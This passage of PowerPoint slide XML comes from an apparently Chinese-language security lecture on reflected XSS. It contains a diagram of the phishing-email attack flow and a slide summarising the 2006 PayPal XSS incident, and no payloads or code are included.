              <a:t>基本情景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17412" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17413" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17414" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1524000"/>
            <a:ext cx="1723549" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击性服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17415" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5677649" y="4542446"/>
            <a:ext cx="1723549" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害的服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17416" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17417" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="410766" y="3936940"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害的用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3123601" y="1663670"/>
            <a:ext cx="1871282" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4109" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="3015697" y="2270095"/>
            <a:ext cx="1723549" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送恶意邮件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17420" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17421" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>点击链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17422" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>响应用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17423" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1949450"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17424" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2606675"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17425" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="3705225"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17426" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17427" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17428" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2880662" y="2749520"/>
            <a:ext cx="2236510" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送有价值的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17429" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3048000"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17430" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="4006850"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1676400"/>
            <a:ext cx="1053750" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17432" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>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dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>年的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>攻击者通过电子邮件与用户联系，并欺骗他们访问合法的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>网站上的特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入代码将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>访问者重定向到新的页面，警告用户他们的帐户已被盗用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>受害者被重定向到钓鱼网站，并提示输入敏感的财务数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.acunetix.com/news/paypal.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 2" descr="PayPal">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect r="41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="533400"/>
            <a:ext cx="1778000" cy="762000"/>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8" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPts val="2800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
